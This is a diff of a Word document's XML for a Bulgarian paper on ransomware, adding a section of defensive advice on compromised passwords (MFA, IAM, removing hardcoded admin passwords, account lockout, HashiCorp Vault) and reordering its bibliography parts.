               <w:noProof/>
-              <w:lang w:val="en-US"/>
+              <w:lang w:eastAsia="bg-BG"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc223341830" w:history="1">
+          <w:hyperlink w:anchor="_Toc223346809" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -1616,7 +1630,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc223341830 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc223346809 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1678,7 +1692,7 @@
           <w:rFonts w:eastAsia="Aptos"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc223341818"/>
+      <w:bookmarkStart w:id="0" w:name="_Toc223346797"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Aptos"/>
@@ -1846,7 +1860,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc223341819"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc223346798"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">История на </w:t>
@@ -2015,7 +2029,7 @@
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc223341820"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc223346799"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Еволюция на </w:t>
@@ -2042,7 +2056,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc223341821"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc223346800"/>
       <w:r>
         <w:t xml:space="preserve">Ранна фаза на </w:t>
       </w:r>
@@ -2290,7 +2304,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc223341822"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc223346801"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -2701,7 +2715,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc223341823"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc223346802"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3157,7 +3171,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc223341824"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc223346803"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3325,7 +3339,7 @@
           <w:numId w:val="2"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc223341825"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc223346804"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="en-US"/>
@@ -3547,7 +3561,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc223341826"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc223346805"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Стратегии и защита от </w:t>
@@ -3601,7 +3615,7 @@
           <w:numId w:val="6"/>
         </w:numPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc223341827"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc223346806"/>
       <w:r>
         <w:t xml:space="preserve">Подготовка за </w:t>
       </w:r>
@@ -3786,10 +3800,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="10" w:name="_Toc223341828"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc223346807"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Превенция </w:t>
@@ -4253,42 +4264,360 @@
         </w:rPr>
         <w:br w:type="page"/>
       </w:r>
-      <w:bookmarkStart w:id="11" w:name="_Toc223341829"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc223346808"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Компрометирани </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>credentials</w:t>
-      </w:r>
       <w:bookmarkEnd w:id="11"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="360"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+      <w:r>
+        <w:t>пароли</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Задължителна имплементация на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>MFA</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> за всички услуги, особено имейли, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>VPNs</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и акаунти, които имат достъп до важни системи. Ескалация към отговорните лица, когато дадена система е установена, че не позволява </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>MFA</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> или потребители, които не използват </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">MFA. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Съвременните </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Multi factor authentication </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">заменят процеса с двете пароли към аутентикация с пръстов отпечатък, лицево разпознаване, ПИН на устройството или криптографичен ключ. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Имплементация на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Identity and Access Management (IAM) </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">системи, за да могат администраторите за мониторинг и менажиране на роли, достъп до мрежи на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>on-premise</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>cloud</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> базирани апликации.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Подмяна на админските пароли. Често по време на разработка на дадена услуга/апликация, програмистите използват пароли, които са известни на целия екип, за да си улеснят работния процес. Това е приемливо, когато продуктът не е деплойнат и само се тестват функционалностите. Ако тези пароли останат в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>codebase</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, тогава хакерът има </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>backdoor</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (фиг. 10)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Същото важи и за акаунти с</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> root access,</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> които се използват за ежедневни задачи.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Независимо дали става въпрос за лични акаунти или фирмени, необходимо е една парола да бъде поне 15 символа. Използването на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Password managers e </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">препоръчително, ако потребителят има проблем с запомнянето на паролите. Не трябва пароли да се съхраняват в текстови файлове в </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">устройствата. </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Не е добре паролите да се съхраняват в браузера.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Имплементация на заключване на акаунти при множество неуспешни опити. Логване и мониторинг на опитите за логин е необходимо за разпознаване на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>brute force</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> атаки.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Токени и други</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> private keys</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> трябва да се помещават в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vaults.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Задължително е използването на силно</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>хаширащи алгоритми.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Едно такова решение е имплементацията на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HashiCorp Vault. Vault</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> е система за чувствителна информация – пароли, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>API</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ключове, токени, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SSH</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> ключове, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>TLS</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> сертификати и др. Решава проблема на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>hardcoded</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> пароли, споделени пароли, частни ключове в гит и ръчна ротация. Данните в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vault</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> са криптирани, има контрол до достъпа и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">audit </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">логове. Поддържа </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>LDAP, OIDC, IAM</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и много други. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2539453B" wp14:editId="524CEDBD">
+            <wp:extent cx="5471160" cy="1966047"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="470062905" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="470062905" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5480519" cy="1969410"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:bookmarkStart w:id="12" w:name="_Toc223341830" w:displacedByCustomXml="next"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(Фиг. 10 – диаграма защо използването на пароли по подразбиране не е препоръчително)</w:t>
+      </w:r>
+    </w:p>
+    <w:bookmarkStart w:id="12" w:name="_Toc223346809" w:displacedByCustomXml="next"/>
     <w:sdt>
       <w:sdtPr>
         <w:rPr>
@@ -6812,14 +7141,6 @@
 </file>
 
 <file path=customXml/item1.xml><?xml version="1.0" encoding="utf-8"?>
-<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
-  <documentManagement>
-    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
-  </documentManagement>
-</p:properties>
-</file>
-
-<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
 <?mso-contentType ?>
 <FormTemplates xmlns="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms">
   <Display>DocumentLibraryForm</Display>
@@ -6828,7 +7149,143 @@
 </FormTemplates>
 </file>
 
+<file path=customXml/item2.xml><?xml version="1.0" encoding="utf-8"?>
+<p:properties xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:pc="http://schemas.microsoft.com/office/infopath/2007/PartnerControls">
+  <documentManagement>
+    <_activity xmlns="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xsi:nil="true"/>
+  </documentManagement>
+</p:properties>
+</file>
+
 <file path=customXml/item3.xml><?xml version="1.0" encoding="utf-8"?>
+<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
+  <b:Source>
+    <b:Tag>Sto</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
+    <b:Title>#StopRansomware Guide</b:Title>
+    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
+    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
+    <b:RefOrder>1</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Ran</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
+    <b:Title>Ransomware </b:Title>
+    <b:ProductionCompany>FBI</b:ProductionCompany>
+    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
+    <b:RefOrder>2</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Kur22</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Baker</b:Last>
+            <b:First>Kurt</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>History of Ransomware</b:Title>
+    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
+    <b:Year>2022</b:Year>
+    <b:Month>10</b:Month>
+    <b:Day>09</b:Day>
+    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
+    <b:RefOrder>3</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Bot</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{20B2E95D-A0FA-4944-85FB-E71D64664F65}</b:Guid>
+    <b:Title>Botnet</b:Title>
+    <b:ProductionCompany>Eset</b:ProductionCompany>
+    <b:URL>https://help.eset.com/glossary/bg-BG/botnet.html</b:URL>
+    <b:RefOrder>4</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>CCS</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{F37D6060-4B83-48F8-ADC6-94648278B6D6}</b:Guid>
+    <b:Title>CC Server</b:Title>
+    <b:ProductionCompany>Eset</b:ProductionCompany>
+    <b:URL>https://help.eset.com/glossary/bg-BG/cc_server.html</b:URL>
+    <b:RefOrder>5</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Фил20</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
+    <b:Author>
+      <b:Author>
+        <b:NameList>
+          <b:Person>
+            <b:Last>Петров</b:Last>
+            <b:First>Филип</b:First>
+          </b:Person>
+        </b:NameList>
+      </b:Author>
+    </b:Author>
+    <b:Title>RSA</b:Title>
+    <b:Year>2020</b:Year>
+    <b:Month>02</b:Month>
+    <b:Day>16</b:Day>
+    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
+    <b:RefOrder>6</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Wha25</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
+    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
+    <b:ProductionCompany>Secure W2</b:ProductionCompany>
+    <b:Year>2025</b:Year>
+    <b:Month>09</b:Month>
+    <b:Day>15</b:Day>
+    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
+    <b:RefOrder>7</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>arc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
+    <b:Title>archiveus-trojan</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
+    <b:RefOrder>8</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Spe</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
+    <b:Title>Spear phishing</b:Title>
+    <b:ProductionCompany>Ibm</b:ProductionCompany>
+    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
+    <b:Author>
+      <b:Author>
+        <b:Corporate>Matthew Kosinski</b:Corporate>
+      </b:Author>
+    </b:Author>
+    <b:RefOrder>9</b:RefOrder>
+  </b:Source>
+  <b:Source>
+    <b:Tag>Gpc</b:Tag>
+    <b:SourceType>InternetSite</b:SourceType>
+    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
+    <b:Title>Gpcode</b:Title>
+    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
+    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
+    <b:RefOrder>10</b:RefOrder>
+  </b:Source>
+</b:Sources>
+</file>
+
+<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
 <ct:contentTypeSchema xmlns:ct="http://schemas.microsoft.com/office/2006/metadata/contentType" xmlns:ma="http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes" ct:_="" ma:_="" ma:contentTypeName="Document" ma:contentTypeID="0x010100EA7F95447AE5CD4A96E24D58484FA3D2" ma:contentTypeVersion="9" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="152a1f3b266b5df558eb501d08fa54b7">
   <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="16eb03e4-fe34-41e0-b148-6c2f228be8b6" xmlns:ns4="c5dcd230-26b3-4f1e-a7d8-2c2a40be033b" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="ebbaa98d623378dfae11ad7cf338cc80" ns3:_="" ns4:_="">
     <xsd:import namespace="16eb03e4-fe34-41e0-b148-6c2f228be8b6"/>
@@ -7023,135 +7480,15 @@
 </ct:contentTypeSchema>
 </file>
 
-<file path=customXml/item4.xml><?xml version="1.0" encoding="utf-8"?>
-<b:Sources xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" SelectedStyle="\IEEE2006OfficeOnline.xsl" StyleName="IEEE" Version="2006">
-  <b:Source>
-    <b:Tag>Sto</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{2B4BF2B4-2B0E-46EC-8A46-8D9494091BBA}</b:Guid>
-    <b:Title>#StopRansomware Guide</b:Title>
-    <b:ProductionCompany>Americas Cyber Defense Agency</b:ProductionCompany>
-    <b:URL>https://www.cisa.gov/stopransomware/ransomware-guide</b:URL>
-    <b:RefOrder>1</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Ran</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{472FD183-EF2C-470D-A6D1-9E653F75936C}</b:Guid>
-    <b:Title>Ransomware </b:Title>
-    <b:ProductionCompany>FBI</b:ProductionCompany>
-    <b:URL>https://www.fbi.gov/how-we-can-help-you/scams-and-safety/common-frauds-and-scams/ransomware</b:URL>
-    <b:RefOrder>2</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Kur22</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{45B254F4-2ED7-4796-9145-8DA52FF7374D}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Baker</b:Last>
-            <b:First>Kurt</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>History of Ransomware</b:Title>
-    <b:ProductionCompany>CrowdStrike</b:ProductionCompany>
-    <b:Year>2022</b:Year>
-    <b:Month>10</b:Month>
-    <b:Day>09</b:Day>
-    <b:URL>https://www.crowdstrike.com/en-us/cybersecurity-101/ransomware/history-of-ransomware/</b:URL>
-    <b:RefOrder>3</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Bot</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{20B2E95D-A0FA-4944-85FB-E71D64664F65}</b:Guid>
-    <b:Title>Botnet</b:Title>
-    <b:ProductionCompany>Eset</b:ProductionCompany>
-    <b:URL>https://help.eset.com/glossary/bg-BG/botnet.html</b:URL>
-    <b:RefOrder>4</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>CCS</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{F37D6060-4B83-48F8-ADC6-94648278B6D6}</b:Guid>
-    <b:Title>CC Server</b:Title>
-    <b:ProductionCompany>Eset</b:ProductionCompany>
-    <b:URL>https://help.eset.com/glossary/bg-BG/cc_server.html</b:URL>
-    <b:RefOrder>5</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Фил20</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{D0ACEC89-B82E-4903-BDB0-FD382F8077D3}</b:Guid>
-    <b:Author>
-      <b:Author>
-        <b:NameList>
-          <b:Person>
-            <b:Last>Петров</b:Last>
-            <b:First>Филип</b:First>
-          </b:Person>
-        </b:NameList>
-      </b:Author>
-    </b:Author>
-    <b:Title>RSA</b:Title>
-    <b:Year>2020</b:Year>
-    <b:Month>02</b:Month>
-    <b:Day>16</b:Day>
-    <b:URL>https://www.cphpvb.net/network-security/10840-rsa-with-example/</b:URL>
-    <b:RefOrder>6</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Wha25</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{5B16835C-9C43-4285-BAF5-D4B2F3F24F90}</b:Guid>
-    <b:Title>What is RSA Asymmetric Encryption? How Does it Work?</b:Title>
-    <b:ProductionCompany>Secure W2</b:ProductionCompany>
-    <b:Year>2025</b:Year>
-    <b:Month>09</b:Month>
-    <b:Day>15</b:Day>
-    <b:URL>https://www.securew2.com/blog/what-is-rsa-asymmetric-encryption</b:URL>
-    <b:RefOrder>7</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>arc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{B1A9D737-2102-49C1-98B1-5A289956686D}</b:Guid>
-    <b:Title>archiveus-trojan</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/archiveus-trojan</b:URL>
-    <b:RefOrder>8</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Spe</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{AC188D98-B7F5-4E78-BC9F-61D0C37525B1}</b:Guid>
-    <b:Title>Spear phishing</b:Title>
-    <b:ProductionCompany>Ibm</b:ProductionCompany>
-    <b:URL>https://www.ibm.com/think/topics/spear-phishing</b:URL>
-    <b:Author>
-      <b:Author>
-        <b:Corporate>Matthew Kosinski</b:Corporate>
-      </b:Author>
-    </b:Author>
-    <b:RefOrder>9</b:RefOrder>
-  </b:Source>
-  <b:Source>
-    <b:Tag>Gpc</b:Tag>
-    <b:SourceType>InternetSite</b:SourceType>
-    <b:Guid>{327CB1AD-525D-4623-BC38-89F7CF280C15}</b:Guid>
-    <b:Title>Gpcode</b:Title>
-    <b:ProductionCompany>Knowbe4</b:ProductionCompany>
-    <b:URL>https://www.knowbe4.com/ransomware-knowledgebase/gpcode</b:URL>
-    <b:RefOrder>10</b:RefOrder>
-  </b:Source>
-</b:Sources>
+<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95434D9A-8BA9-420D-93D1-CF746F074EA1}">
+  <ds:schemaRefs>
+    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
+  </ds:schemaRefs>
